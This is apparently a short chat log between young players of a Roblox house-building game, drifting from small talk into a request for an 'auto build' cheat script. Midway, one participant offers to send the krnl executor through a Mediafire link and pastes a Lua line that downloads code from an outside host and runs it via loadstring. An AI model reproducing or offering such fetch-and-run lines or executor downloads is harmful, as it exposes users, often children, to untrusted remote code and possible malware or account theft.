Look Guys There is a lot dirty dishes and i did eat a lot food ! did you do that at game ?
i could never eat that much
yeah.i should dont eat too much
can u help me wit sum
with what ?
do you know how auto build plots with scripts or you dont do dat
yes why asking ?
what script do you use?
i am trying to auto build a house and i need a script
krnl i can send mediafire link to u
if you dont have autobuild script is lumbsmasher you can get it by script
lumbsmasher: local http_request = http_request or request or (syn and syn.request) or (http and http.request)
loadstring(http_request({Url=“https://chroma.temple.cx/scripts/bloxburg.lua”, Method=“GET”}).Body)()
oh ok ty for helping me
no problem. you can massage me if it doesnt work
ok tysm for helping me
it dont work
oh… then do you mean exploiter or script
script if you know what i mean
ok you need to join discord